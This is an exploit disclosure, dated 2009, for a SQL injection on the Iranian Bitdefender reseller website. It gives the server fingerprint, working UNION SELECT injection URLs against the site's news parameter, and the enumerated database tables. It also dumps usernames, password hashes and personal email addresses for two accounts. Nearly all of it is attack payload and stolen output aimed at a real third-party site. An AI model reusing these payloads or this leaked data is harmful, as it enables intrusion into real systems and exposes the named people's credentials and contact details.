---------------------------------------------------------------------------------------------------------------------------

[+] Bitdefender Antivirus Iran suffers from a remote SQL injection
vulnerability
[+] Found By: Rohit Bansal
[+] Date: 01-06-2009

----------------------------------------------------------------------------------------------------------------------------

Host Information

    Server = Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5
mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
    Version = 4.1.22-standard
    Powered by = PHP/5.2.5
    Attack Type = SQL Union Injection
    Current User = bitdef_root@localhost
    Current Database = bitdef_wp
    Supports Union = yes
    Union Columns = 11

Url| http://www.bitdefender.ir/index.php?tab=33&newsid=-2

Vuln: http://www.bitdefender.ir/index.php?tab=33&newsid=-2+and+1=0+ Union
Select  1 , UNHEX(HEX([visible])) ,3,4,5,6,7,8,9,10,11

Comment: --

Visible Column: 2


Tables:users
    articles
    groups
    news
    settings
    users

Columns: Table users
    username
    password
    email

username:password:email:

admin:e2b0f047e7b3be3b9622fd8f3cc2856f:ehsan_baghaki@yahoo.com<admin%3Ae2b0f047e7b3be3b9622fd8f3cc2856f%3Aehsan_baghaki@yahoo.com>
:
sahar:194559d634b2bfbef05fb8feed45d625:Jahangiri@4souk.int<sahar%3A194559d634b2bfbef05fb8feed45d625%3AJahangiri@4souk.int>
:

http://www.bitdefender.ir/index.php?tab=33&newsid=-2+union+all+select+1,concat(username,0x3e,password),3,4,5,6,7,8,9,10,11+from+users--


--------------------------------------------------------------------------------------------------------------------------
[+]^Rohit Bansal [rohitisback@gmail.com]
[+] Schap.org, Infysec, Evilfinger
-------------------------------------------------------------------------------------------------------------------------